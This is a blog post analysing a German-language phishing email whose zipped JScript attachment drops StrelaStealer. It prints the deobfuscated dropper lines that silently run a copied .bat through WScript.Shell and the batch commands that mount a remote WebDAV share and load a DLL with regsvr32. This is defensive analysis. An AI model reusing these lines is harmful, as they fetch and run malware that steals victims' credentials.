Email Spam Scavenger Hunt
A few days ago I saw a little '1' next to the name of my spam folder. Protonmail automatically classified it as spam/phishing and did not notify me, which is great!
But I got curious..
data:image/s3,"s3://crabby-images/f5bd4/f5bd4a0d3ab4fd49825b6e739c580b954059206d" alt=""
So the natural thing, of course, it to download it :)
Heading into a debian VM with VPN, Virustotal had some matches
data:image/s3,"s3://crabby-images/53386/53386075048a4d07734023ca133aaaa2e873b34a" alt=""
Let's look what is inside:
unzip Ihre-Rechnung.zip
Archive:
inflating: 1540178271582926623.js
Interesting... a js file
data:image/s3,"s3://crabby-images/89a21/89a21e2c3793471984a001bfb85389ccb767f13f" alt=""
The code is obfuscated using some sort of lookup array which can be reversed to:
data:image/s3,"s3://crabby-images/87eef/87eef4ed60879a19674fd759e090a7629afeff21" alt=""
which results in
Function("return this")()["WScript"]["CreateObject"]("WScript.Shell")["run"]('cmd /k copy "' + this["WScript"]["ScriptFullName"] + '" "%userprofile%\\\\fzhcgn.bat" && "%userprofile%\\\\fzhcgn.bat"', 0, false);
this.WScript.CreateObject('WScript.Shell').run('cmd /k copy "' + this.WScript.ScriptFullName+ '" "%userprofile%\\\\fzhcgn.bat" && "%userprofile%\\\\fzhcgn.bat"', 0, false);
the actual js code
My guess is that the hacker basically expects the victim to extract the zip file and double-click the js file.
This works because the default behaviour of Windows is to run js files using the script host (WScript).
data:image/s3,"s3://crabby-images/4218a/4218a9c3c02c41bf34467b9bdb6758e80830cc4d" alt=""
I created a little hack.js file as a test:
try {
test();
} catch (e) {
Function(
'return this'
)()
['WScript']
['CreateObject']
('WScript.Shell')
['run']
('cmd /k echo "' + this['WScript']['ScriptFullName']+ '" > "%userprofile%\\\\test.txt"', 0, false);
}
hack.js test
This should echo the script path and name of the js file to a file called test.txt when double-clicked... and it indeed does.
data:image/s3,"s3://crabby-images/0a355/0a35565052e586d355f7d20e3257e1f260334037" alt=""
The creepy part is that I saw nothing pop up or anything like it, everything happened silently in the background!
The real js would have copied the path of the downloaded js file into a file called "fzhcgn.bat" and executed it immediately. This is where the commented-out stuff above the js comes into play. This is more obfuscated code but this time batch code.
It also works by replacing each char with a variable, the result is this:
net use \\45.x.x.x@8888\DavWWWRoot\
regsvr32 /s \\45.x.x.x@8888\DavWWWRoot\52.dll
deobfuscated batch code
Looks like it mounts a webdav share and then uses regsvr32 to register a dll file (I removed the last bit of the IP for security reasons, whois just says its in russia by "server21")
Running curl in the linux VM resulted in a 403 Forbidden because of the VPN, it seems like the mail is specifically targeted towards german clients.
After using a german proxy, we get a directory listing:
data:image/s3,"s3://crabby-images/1099d/1099d55506fae756f2c1a4ba6eef63702972f072" alt=""
a lot of files... lets get ours.
data:image/s3,"s3://crabby-images/fa00c/fa00cf0d9879be25ea9ddf93d430bad0fb79040f" alt=""
According to the two "behaviour sandboxes", it is classified as StrelaStealer. Which matches to a german news article that came out recently https://www.golem.de/news/angriffe-auf-deutschland-malware-meidet-infektion-russischer-systeme-2406-186424.html
It also mentions the same IP I came across.
I used https://dogbolt.org/ to get a basic decompile done but as mentioned in the article https://blog.sonicwall.com/en-us/2024/04/updated-strelastealer-targeting-european-countries/ the code is heavily obfuscated
data:image/s3,"s3://crabby-images/d6960/d696090b47f71b3812abcd0f13380f095146a831" alt=""
As my knowledge of C# is not good enough, and statically analysing the code is not the way to go, I stopped at this point. The correct way is to debug the code in a safe environment, such as the sonicwall article mentioned above.
My advice would be to change your default app for ".js", just to be safe ^^
data:image/s3,"s3://crabby-images/1b670/1b67025945aa848ffa082396d7cb3a59b3fc47d7" alt=""
Update 07.07.2024
Received a second and a third one one:
data:image/s3,"s3://crabby-images/401c3/401c3feb08663df7a8453cbfd56773c2cc16a684" alt=""
interestingly this was spam but not marked as phishing, so let's help protonmail out
data:image/s3,"s3://crabby-images/7046a/7046a87037a0eb13b32ffc80468c0a1937b6feea" alt=""
The brave browser immediately flagged it as Virus after downloading, firefox let me download the zip. And, as expected, it contains a <number>.js file.
The code has the same structure, just the variable names of the "lookup" arrays are different.
Just for fun I wrote a little script that unpacks the stuff using regex to avoid executing it in any way:
data:image/s3,"s3://crabby-images/e3222/e32225164998df84f80d1cc04cdfe1750c924fca" alt=""
Similar code, same IP